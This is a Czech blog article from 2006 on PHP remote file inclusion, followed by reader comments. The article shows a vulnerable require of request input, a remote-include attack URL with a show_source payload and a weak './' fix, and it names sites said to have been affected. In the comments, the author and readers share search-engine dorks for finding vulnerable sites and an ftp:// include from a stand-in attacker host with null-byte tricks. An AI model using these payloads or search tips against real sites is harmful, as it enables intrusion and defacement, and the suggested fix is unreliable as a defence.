PHP injekce Mozektevidi.net - Mozektevidi.net.

PHP injekce

Popis php injekce, využití, zneužití, nebezpečné weby. PHP inekcí padlo hodně webů. Braňte se proti skript kiddies

úvod Php injekce

Toto je velmi základní chyba. Kdo má tuto chybu na svém webu, tak mu web "hackne" i 13ti letá holka. Takže proč nechávat útočníkům (lamkám co neumí nic lepšího než ničit) otevřené dveře? Oprava je velmi jednoduchá

Obsahuje můj web tu chybu?

Jestli-že struktura vašich stránek vypadá přibličně takto:
http://mozektevidi.ic.cz//clanek/php-injekce
je jistá pravděpodobnost, že web je napadnutelný. Pro zkoušku zkus:
http://mozektevidi.ic.cz//clanek/http://google.com.
Zobrazil se někde na stánce google? Tak pozor, chyba zde je!
Poznámka: Místo clanek může být cokoliv, např: show, wiew, go, jdi.., inspiraci se meze nekladou.

Jak takový web najít?

Když už někdo takový web hledá, hledá ho kvůli ničení. Proto zde nebude dávat text, co se má zadat do google.

Jaká je zneužitelnost?

Někdo si řekne:„Co tomu vadí, nějaký google na stránce, pche“. No ale co když adresa bude vypadat třeba takto:
http://mozektevidi.ic.cz//clanek/http://mujweb.wz.cz/script.txt?
To už nastává pro webmastera docela problém. Tímto odkazem provede web cizí script, který může vypadat třeba takto:

show_source("index.php");

To už je docela blbé. Chyba byla například na webu pragueexclusive.com nebo dasilvio.cz.

Obrana?

Obrana je jednoduchá. Prakticky jde o to, aby se před proměnou $data vložilo ./. V případě útoku typu
http://mozektevidi.ic.cz/index.php/clanek/http://seznam.cz
se nevloží seznam.cz ale ./http://seznam.cz

Špatně

$data= $_REQUEST["g"];
require $data;

Snad dobře

$data= $_REQUEST["g"];
$data = "./". $data;

autor článku OS | datum publikování 18.listopad.2006 17:10 | články o IT bezpečnosti a obraně proti hackingu IT bezpečnost |

Kometáře

#1 woxo2 wwwwww.woxo2.szm.sk

Caute Lidi ma niekto aj nejaky navod na vybielenie stranok na serveri szm.sk ? reaguj

datum 24.11.2006 20:41

unknown unknown

#2 woxo2 www

Caute Lidi ma niekto aj nejaky navod na vybielenie stranok na serveri szm.sk ? reaguj

datum 24.11.2006 20:41

unknown unknown

#3 jirik www

Tento web, je úžasný, dokonalost sama. Autor umí.. Fotky jsou super, kdy zajdeme na další akci? Byl jsi úžasný.. reaguj

datum 27.11.2006 22:10

unknown unknown

#4 Pecullus www

Pěkný.
Autorovy fandím. Člověk se alespoň dozví jakých chyb se při psaní www stránek vyvarovat. reaguj

datum 30.11.2006 14:36

unknown unknown

#5 MzK wwwmozektevidi.net

TO jirik: Díky reaguj

datum 30.11.2006 15:22

unknown unknown

#6 ui www

Tento web, je úžasný, dokonalost sama. Autor umí.. Fotky jsou super, kdy zajdeme na další akci? Byl jsi úžasný.. reaguj

datum 02.12.2006 10:29

unknown unknown

#7 radši ne wwwne

no jo, ale co když se mi zobratuje jen to, vo mam napsaný v script.txd??? :-# reaguj

datum 22.12.2006 09:18

unknown unknown

#8 MzK wwwmozektevidi.net

TO radši ne: Musí to bát txt ne txd! reaguj

datum 22.12.2006 10:27

unknown unknown

#9 radši ne wwwne

že by? RED reaguj

datum 22.12.2006 15:27

unknown unknown

#10 jeks www

mozna na google staci napsat index.php?page=
Nebo je este neco jistejsiho? reaguj

datum 25.12.2006 10:42

unknown unknown

#11 matej21 www

czus vyzkousejte www.google.cz/search
to by melo najit vsechny cesky stranky ktery maj v url index a jedno ze slov page, strana,nebo show :-D reaguj

datum 28.12.2006 18:39

unknown unknown

#12 matej21 www

LoL sry ten odkaz je jen www.google.cz/search reaguj

datum 28.12.2006 18:40

unknown unknown

#13 MzK wwwmozektevidi.net

TO matej21: Ještě bych doplnil hledat inurl wz, borec, ic.cz a podobné free hostingy. Tam je větší pravděpodobnost amatérské tvorby. I když já našel i lepší ryby - mozektevidi.ic.cz/index.php nejenom na webz 8-) reaguj

datum 28.12.2006 19:43

unknown unknown

#14 Bily www

Hodne dobre pages.... Celkem me to zajima tak se tak divam ale zas tolik tech webu ktere jdou hacknout php injekci neni....zatim sem zadny nenasel. Ale fakt thx za tyhle strankySMIL reaguj

datum 28.12.2006 19:55

unknown unknown

#15 MzK wwwmozektevidi.net

TO Bily: Ani se nedivím, že neexistuje tolik stránek. Jednak je hodně webů řešeno přes databáze a druhá věc je, že php injekci ovládá každý rádoby hacker. Takže těch webů ubývá dost rychle. reaguj

datum 28.12.2006 21:05

unknown unknown

#16 80rac3k www

No, já to zkusil na svůj web...spíš administraci, páč web mám řešený trochu jinak. Tak jsem přišel (možná) na další zabezpečovací metodu: Pokud ty data vkládáte ze souboru, tak všechny ty soubory nahrňtě do složky.
Teď např. při pokusus s googlem php vyhodí chybu:

Warning: require_once(pages/google.com.php/ ) [function.require-once]: failed to open stream: No such file or directory in ...

Ale samozřejmě se to nedá použít na stránky vkládáné z DB.

Avšak nevím, zda nejde nějak zneužít používání proměnných v url...třeba www.neco.cz/a.php Když se vloží nějaký kód místo "20" , tak by se to teoreticky dalo hacknout, ne? reaguj

datum 03.02.2007 14:46

unknown unknown

#17 MzK wwwmozektevidi.net

TO 80rac3k: Záleží co je přesně to ID. Pokud se to tahá z databáze tak se použije sql injection. Tou SQL injection se smaže tabulka, či se exportují hesla (hashe) a mnohem víc. Pokud se vkládá do souboru, a soubor se jmenuje 20.php tak by to šlo, pokud není ochrana "./".$id.".php" reaguj

datum 03.02.2007 14:57

unknown unknown

#18 80rac3k www

Jasně, chápu. Ale když máš v php zapnuto magic_quotes_gpc , tak se ti před všechny ' vloží / , tím je to de facto zabezpečené. Jen nevím, zda nelze url s proměnnými zneužít i bez použití ' ... reaguj

datum 03.02.2007 20:57

unknown unknown

#19 MzK wwwmozektevidi.net

TO 80rac3k: Máš pravdu, když je ochrana na serveru tak nemusíš ./ Ale co kdyby se pravidla ze dne na den změnila? Třeba že by to někdo chtěl zapnout případně by nahrávali novou verzi php, kde by to bylo neošetřené? Lepší je programovat přímo bezpečné skripty reaguj

datum 03.02.2007 21:24

unknown unknown

#20 tracy www

Ještě horší, než nevědomost, je falešná sebejistota že to mám zabezpečené a nic se mi nemůže stát.

Přidání toho ".php" je úplně zbytečné, protože stačí, aby útočník poslal v $id url s otazníkem na konci a ta dodaná přípona se bude brát jako přebytečný argument k tomu url.

Podobně bych ti mohl podstrčit řídící znak pro backspace a umazat ten začátek. Naštěstí to nejde jen tak z adresního řádku. reaguj

datum 22.02.2007 19:35

unknown unknown

#21 MzK wwwmozektevidi.net

TO tracy: Myslím že nefunguje require "neco.php?parametr" parametry nejdou vkládat. Taky jsem viděl tipy vložit na konec "nulu". Vyšel perfektní přehled na soomu reaguj

datum 22.02.2007 19:41

unknown unknown

#22 tracy www

Měl jsem na mysli to, že při ochraně pouze přidáním ".php" se dá stále includovat http;//www.example.com/haxor

Takže je to tam zbytečné. reaguj

datum 23.02.2007 01:33

unknown unknown

#23 MzK wwwmozektevidi.net

TO tracy: Můžeš použít index.php?page=ftp://login:heslo@hacker.freehosting.tld/script nebo script.txt%00 nebo si přečti příručku www.soom.cz/index.php reaguj

datum 23.02.2007 08:52

unknown unknown

#24 Joe www

Warning: main(p_neco.php/ ): failed to open stream: No such file or directory in /3w/wz.cz/p/blabla/neco.php on line 37


Warning: main(): Failed opening 'p_neco.php/ ' for inclusion (include_path='.:/usr/local/lib/php') in /3w/wz.cz/p/blablabla/bla.php on line 37


Tak to asi funguje tak PHP injekce že??? NVM

No kdyby fakala tak co mám udělat dál???? abych to dodělal tu PHP injekci aby sem videl jak to teda vypada na konci pripadne ze bych tam napsal Hacknuto dle Mzk a pak jim rict kde je chyba........ :-D :-P :-D reaguj

datum 27.05.2007 21:25

unknown unknown

Nové kometáře nejsou povolené.